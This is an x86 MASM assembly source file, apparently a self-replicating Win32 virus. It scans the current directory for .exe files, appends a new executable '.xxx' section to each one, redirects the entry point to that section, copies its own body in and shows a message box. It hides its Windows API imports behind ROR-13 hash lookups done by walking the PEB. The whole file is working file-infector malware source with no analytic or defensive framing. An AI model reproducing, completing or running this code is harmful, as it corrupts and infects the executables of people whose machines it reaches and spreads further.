InFectCode.asm

  1. .386
  2. .model flat, stdcall
  3.  
  4. option casemap:none
  5. assume fs:nothing
  6. .code
  7. start:
  8. v_start:
  9.     call delta
  10. delta:
  11.     pop ebp
  12.     sub ebp, offset delta  
  13.     lea esi, [ebp + WIN32_FIND_DATA]
  14.     push esi
  15.     lea esi, [ebp + exe]
  16.     push esi
  17.     push 095DA3590h
  18.     call getapi
  19.     call eax
  20.     mov [ebp + hFind], eax
  21.     test eax,eax
  22.     jne _findName
  23.     push [ebp + hFind]
  24.     push 05E70317Ch
  25.     call getapi
  26.     call eax
  27.     ;jmp _exit
  28. _findName:
  29.    lea esi, [ebp + WIN32_FIND_DATA.cFileName]
  30.  
  31. _returnHost:
  32.   lea eax, [ebp +_returnHost]
  33.   mov [ebp + returnHost], eax
  34.   call infect
  35.   lea esi, [ebp + WIN32_FIND_DATA]
  36.   push esi
  37.   push [ebp + hFind]
  38.   push 0F76C45E7h
  39.   call getapi
  40.   call eax
  41.   cmp eax, 0
  42.   jne _findName
  43.   ;ret
  44. _exit:  
  45.   ; ExitProcess
  46.     lea eax, [ebp + v_start]
  47.     cmp eax, 401000h
  48.     je  _jmpOEP
  49.     ; end writefile
  50.     mov eax, [ebp + OEPFileInFect]
  51.     push eax
  52.     ret
  53. _jmpOEP:    
  54.     call jmpOEPHostFile    
  55.     ;mov eax,0
  56.     ;push eax
  57.     ;push 56A2B5F0h
  58.     ;call getapi
  59.     ;call eax
  60. infect proc    
  61.     push 00h
  62.     push 80h
  63.     push 3
  64.     push 0
  65.     push 3
  66.     push 0C0000000h
  67.     ;lea esi, [ebp + filename]
  68.     push esi
  69.     push 04FDAF6DAh
  70.     call getapi
  71.     call eax
  72.     ;--- GetFileSize
  73.     mov [ebp+ hFile], eax
  74.     cmp eax, 0FFFFFFFFh
  75.     je _exitFunc
  76.     push 0
  77.     push [ebp+hFile]
  78.     push 0701E12C6h
  79.     call getapi
  80.     call eax
  81.     ;--- GetProcessHeap
  82.     mov [ebp + FileSize], eax
  83.     push 0F8245751h
  84.     call getapi
  85.     call eax
  86.     ;--- HeapAlloc
  87.     push [ebp + FileSize]
  88.     push 9
  89.     push eax
  90.     push 067CC0818h
  91.     call getapi
  92.     call eax
  93.     mov [ebp+ BaseAddress],eax
  94.     ;--- ReadFile
  95.     push 0
  96.     lea esi, [ebp+BR]
  97.     push esi
  98.     push [ebp + FileSize]
  99.     push [ebp + BaseAddress]
  100.     push [ebp + hFile]
  101.     push 0BB5F9EADh
  102.     call getapi
  103.     call eax
  104.     ;--- RtlMoveMemory
  105.     push 40h
  106.     push [ebp + BaseAddress]
  107.     lea esi, [ebp + dosHeader]
  108.     push esi
  109.     push 081788FF6h
  110.     call getapi
  111.     call eax
  112.  
  113.     ;--- get NTHeader
  114.     mov eax, [ebp+ BaseAddress]
  115.     add eax, [ebp + dosHeader + 3Ch]
  116.     push 0F8h
  117.     push eax
  118.     lea esi, [ebp+ NTHeader]
  119.     push esi
  120.     push 081788FF6h
  121.     call getapi
  122.     call eax
  123.  
  124.     ;--- get infomation
  125.     xor ebx, ebx
  126.     movzx ebx, word ptr [ebp + NTHeader +6]
  127.     mov [ebp + numberOfSections], bx
  128.  
  129.     mov ebx, [ebp + NTHeader +40]
  130.     mov [ebp+ OEP], ebx
  131.  
  132.     mov ebx, [ebp + NTHeader + 52]
  133.     mov [ebp+ imageBase], ebx
  134.  
  135.     mov ebx, [ebp + NTHeader + 56]
  136.     mov [ebp + sectionAlignment], ebx
  137.  
  138.     mov ebx, [ebp + NTHeader + 60]
  139.     mov [ebp + fileAlignment], ebx
  140.    
  141.     ; --- get last Section
  142.     ;--- sai bắt đầu chỗ này
  143.     mov esi, [ebp + BaseAddress]
  144.     mov eax, [esi + 03ch]
  145.     add esi, eax
  146.  
  147.     mov ax, word ptr [esi + 014h]
  148.     add esi, eax
  149.    
  150.     add esi, 18h
  151.     mov eax, 28h
  152.     movzx ebx, [ebp + numberOfSections]
  153.     mul ebx
  154.     add esi, eax
  155.     sub esi, 28h
  156.     mov eax, [esi]
  157.     ; if sectionName = ".xxx" => injected
  158.     cmp eax, 07878782eh
  159.     je _exitFunc
  160.     mov eax, [esi + 8]
  161.     mov [ebp + virtualSize], eax
  162.  
  163.     mov eax, [esi + 0ch]
  164.     mov [ebp + virtualAddress], eax
  165.  
  166.     mov eax, [esi + 10h]
  167.     mov [ebp + sizeOfRawData], eax
  168.  
  169.     mov eax, [esi + 14h]
  170.     mov [ebp + pointerToRawData], eax
  171.  
  172.     add esi,28h
  173.     ;--- RtlZeroMemory new SectionName
  174.     push 28h
  175.     push esi
  176.     push 0BD784139h
  177.     call getapi
  178.     call eax
  179.     ;---- RtlMoveMemory new SectionName
  180.     push 08h
  181.     lea ebx, [ebp +sectionName]
  182.     push ebx
  183.     push esi
  184.     push 081788FF6h
  185.     call getapi
  186.     call eax
  187.     ;--- Alignmentment
  188.     mov edi, 800h
  189.     mov ecx, [ebp + sectionAlignment]
  190.     mov edx, 0h
  191.     call Alignment
  192.     ; virtualSize
  193.     mov dword ptr [esi + 8], eax
  194.    
  195.  
  196.     mov edi, [ebp + virtualSize]
  197.     mov ecx, [ebp + sectionAlignment]
  198.     mov edx, [ebp + virtualAddress]
  199.     call Alignment
  200.     ; virtualAddress
  201.     mov dword ptr [esi + 0Ch], eax
  202.    
  203.  
  204.     mov edi, 800h
  205.     mov ecx, [ebp + fileAlignment]
  206.     mov edx, 0
  207.     call Alignment
  208.     ; SizeOfRawData
  209.     mov dword ptr [esi + 10h], eax
  210.  
  211.     mov edi, [ebp + sizeOfRawData]
  212.     mov ecx, [ebp + fileAlignment]
  213.     mov edx, [ebp + pointerToRawData]
  214.     call Alignment
  215.     ;PointerToRawData
  216.     mov dword ptr [esi + 14h], eax
  217.     ;Characteristics
  218.     mov dword ptr [esi + 24h], 0E00000E0h
  219.  
  220.     mov ebx, [esi + 8]
  221.     mov [ebp + virtualSize], ebx
  222.  
  223.     mov ebx, [esi + 0Ch]
  224.     mov [ebp + virtualAddress], ebx
  225.  
  226.     mov ebx, [esi + 10h]
  227.     add ebx, [esi + 14h]
  228.  
  229.     ;--- SetFilePointer
  230.     push 2
  231.     push 0
  232.     push ebx
  233.     push [ebp + hFile]
  234.     push 0D812CDAAh
  235.     call getapi
  236.     call eax
  237.  
  238.     ;--- SetEndOfFile
  239.     push [ebp + hFile]
  240.     push 0D7E3CBDBh
  241.     call getapi
  242.     call eax
  243.     ;--- inc numberOfSections
  244.     mov eax, [ebp + BaseAddress]
  245.     mov ebx, [eax + 03ch]
  246.     add eax, ebx
  247.     mov bx, word ptr [eax + 06h]
  248.     inc ebx
  249.     mov [eax + 06h], bx
  250.     ;---set DllCharacteristics = 0
  251.     xor ecx, ecx
  252.     mov [eax + 05eh],cx
  253.     ;--- Set SizeOfImage
  254.     mov ecx, [ebp + virtualAddress]
  255.     add ecx, [ebp + virtualSize]
  256.  
  257.     mov [eax + 050h], ecx
  258.     ;-- Set addressOfEntryPoint
  259.     mov ecx, [ebp + virtualAddress]
  260.     mov [eax + 28h], ecx
  261.     mov [ebp + addressOfEntryPoint],ecx
  262.     ;--- SetFilePointer And WriteFile
  263.     push 0
  264.     push 0
  265.     push 0
  266.     push [ebp + hFile]
  267.     push 0D812CDAAh
  268.     call getapi
  269.     call eax
  270.     ;---------- WriteFile
  271.  
  272.     ; MsgBox
  273.     push 6c6ch
  274.     push 642e3233h
  275.     push 72657375h
  276.     push esp
  277.     push 0726774Ch
  278.     call getapi
  279.     call eax
  280.     push 41786fh
  281.     push 42656761h
  282.     push 7373654Dh
  283.     push esp
  284.     push eax
  285.     push 07802F749h
  286.     call getapi
  287.     call eax
  288.     xor edi, edi
  289.     push edi
  290.     push 021646574h
  291.     push 06365666eh
  292.     push 06920746fh
  293.     push 067206576h
  294.     push 027756f59h
  295.     mov ecx,esp
  296.     push edi
  297.     push edi
  298.     push ecx
  299.     push edi
  300.     xor ebx,ebx
  301.     call eax
  302.     ; end MsgBox
  303.     lea eax, [ebp + v_start]
  304.     cmp eax, 401000h
  305.     jne _next  
  306.     mov eax, [ebp + imageBase]
  307.     add eax, [ebp + OEP]
  308.     mov [ebp + OEP], eax
  309.     mov [ebp + OEPFileInFect], eax
  310.  
  311. _next:
  312.     push 0
  313.     lea esi, [ebp + BR]
  314.     push esi
  315.     push [ebp + FileSize]
  316.     push [ebp + BaseAddress]
  317.     push [ebp + hFile]
  318.     push 05BAE572Dh
  319.     call getapi
  320.     call eax
  321.     ; end writefile
  322.  
  323.     ; file infect
  324.     lea eax, [ebp + v_start]
  325.     lea ecx, [ebp + v_ends]
  326.     sub ecx, eax
  327.     mov [ebp + vrsize], ecx
  328.    
  329.     lea esi, [ebp + v_start]
  330.     push 0
  331.     lea ebx, [ebp + dwByte]
  332.     push ebx
  333.     push ecx
  334.     push esi
  335.     push [ebp + hFile]
  336.     push 05BAE572Dh
  337.     call getapi
  338.     call eax
  339.     ;lea eax, [ebp + v_start]
  340.     ;cmp eax, 401000h
  341.     ;je _exitFunc
  342.     ; end writefile
  343.     ;mov eax, [ebp + OEPFileInFect]
  344.     ;push eax
  345.     ;ret
  346.  
  347. _exitFunc:
  348.     push [ebp + hFile]
  349.     push 0528796C6h
  350.     call getapi
  351.     call eax
  352.     mov eax, [ebp + returnHost]
  353.     add eax, 11h
  354.     push eax
  355.     ret
  356.     ;xor eax,eax
  357.     ;push eax
  358.     ;push 56A2B5F0h ; hash func ExitProcess
  359.     ;call getapi    ; return address func to eax  
  360.     ;call eax
  361. infect endp    
  362.  
  363. jmpOEPHostFile proc
  364.     ;push [ebp + hFile]
  365.     ;push 0528796C6h
  366.     ;call getapi
  367.     ;call eax
  368.     ;mov eax, [ebp + returnHost]
  369.     ;add eax, 11h
  370.    ; push eax
  371.     ;ret
  372.     xor eax,eax
  373.     push eax
  374.     push 56A2B5F0h ; hash func ExitProcess
  375.     call getapi    ; return address func to eax  
  376.     call eax
  377. jmpOEPHostFile endp
  378. ; getapi func return func address to eax
  379. getapi proc
  380. api_call:
  381.   pushad                
  382.   mov ebp, esp          
  383.   xor eax, eax        
  384.   mov edx, fs:[eax+48]
  385.   mov edx, [edx+12]    
  386.   mov edx, [edx+20]    
  387. next_mod:                
  388.   mov esi, [edx+40]      
  389.   movzx ecx, word ptr [edx+38]
  390.   xor edi, edi        
  391. loop_modname:          
  392.   lodsb                
  393.   cmp al, 'a'          
  394.   jl not_lowercase      
  395.   sub al, 20h          
  396. not_lowercase:          
  397.   ror edi, 13          
  398.   add edi, eax          
  399.   loop loop_modname    
  400.   push edx              
  401.   push edi          
  402.   mov edx, [edx+16]    
  403.   mov ecx, [edx+60]    
  404.   mov ecx, [ecx+edx+120]
  405.   jecxz get_next_mod1  
  406.   add ecx, edx          
  407.   push ecx            
  408.   mov ebx, [ecx+32]    
  409.   add ebx, edx          
  410.   mov ecx, [ecx+24]      
  411. get_next_func:          
  412.   jecxz get_next_mod    
  413.   dec ecx              
  414.   mov esi, [ebx+ecx*4]  
  415.   add esi, edx          
  416.   xor edi, edi        
  417. loop_funcname:          
  418.   lodsb                
  419.   ror edi, 13            
  420.   add edi, eax        
  421.   cmp al, ah            
  422.   jne loop_funcname    
  423.   add edi, [ebp-8]      
  424.   cmp edi, [ebp+36]    
  425.   jnz get_next_func    
  426.   pop eax                
  427.   mov ebx, [eax+36]      
  428.   add ebx, edx          
  429.   mov cx, [ebx+2*ecx]  
  430.   mov ebx, [eax+28]      
  431.   add ebx, edx          
  432.   mov eax, [ebx+4*ecx]  
  433.   add eax, edx          
  434.   jmp finish
  435. get_next_mod:            
  436.   pop edi                
  437. get_next_mod1:          
  438.   pop edi              
  439.   pop edx              
  440.   mov edx, [edx]      
  441.   jmp short next_mod    
  442. finish:
  443.   mov [esp+36], eax    
  444.   pop ebx              
  445.   pop ebx              
  446.   popad                
  447.   pop ecx                
  448.   pop edx              
  449.   push ecx              
  450.   ret
  451. getapi endp
  452. Alignment proc
  453.   mov [ebp + sizeofSection], edi
  454.   mov [ebp + tmp], ecx
  455.   mov [ebp + address], edx
  456.   mov eax, [ebp +sizeofSection]
  457.   cdq
  458.   idiv ecx
  459.   mov eax, edx
  460.   test eax, eax
  461.   jne _L2
  462.   mov edx, [ebp + address]
  463.   mov eax, [ebp +sizeofSection]
  464.   add eax, edx
  465.   jmp _L3
  466. _L2:
  467.   mov eax, [ebp +sizeofSection]
  468.   cdq
  469.   idiv [ebp + tmp]
  470.   add eax, 1
  471.   imul eax, [ebp + tmp]
  472.   mov edx, eax
  473.   mov eax, [ebp + address]
  474.   add eax, edx
  475. _L3:
  476.   ret
  477.  
  478. Alignment endp
  479. apitabe:
  480.     returnHost              DWORD ?
  481.     sectionName             db ".xxx",0
  482.     OEPFileInFect           DWORD ?
  483.     exe                     db "*.exe",0
  484.     hFile                   dd ?
  485.     hFind                   DWORD ?
  486.     BaseAddress             dd ?
  487.     BR                      DWORD ?  
  488.     dwByte                  dd ?
  489.     addressOfEntryPoint     DWORD ?
  490.     imageBase               DWORD ?
  491.     numberOfSections        dw ?
  492.     FileSize                DWORD ?
  493.     sectionAlignment        DWORD ?
  494.     fileAlignment           DWORD ?
  495.     virtualAddress          DWORD ?
  496.     virtualSize             DWORD ?      
  497.     OEP                     DWORD ?
  498.     dosHeader               DWORD ?
  499.     NTHeader                DWORD ?
  500.     tmp                     DWORD ?  
  501.     sizeofSection           DWORD ?
  502.     address                 DWORD ?
  503.     sizeOfRawData           DWORD ?
  504.     pointerToRawData        DWORD ?
  505.     vrsize                  dd 0  
  506. FILETIME STRUCT
  507.   dwLowDateTime     DWORD     ?
  508.   dwHighDateTime    DWORD     ?
  509. FILETIME ENDS
  510.  
  511. WIN32_FIND_DATAA STRUCT
  512.    dwFileAttributes       DWORD ?
  513.    ftCreationTime         FILETIME <>
  514.    ftLastAccessTime       FILETIME <>
  515.    ftLastWriteTime        FILETIME <>
  516.    nFileSizeHigh          DWORD ?
  517.    nFileSizeLow           DWORD ?
  518.    dwReserved0            DWORD ?
  519.    dwReserved1            DWORD ?
  520.    cFileName              BYTE 512 dup (?)
  521.    cAlternateFileName     BYTE 14 dup (?)
  522. WIN32_FIND_DATAA ENDS
  523.  
  524. WIN32_FIND_DATA                       WIN32_FIND_DATAA <?>
  525. v_ends:    
  526. end start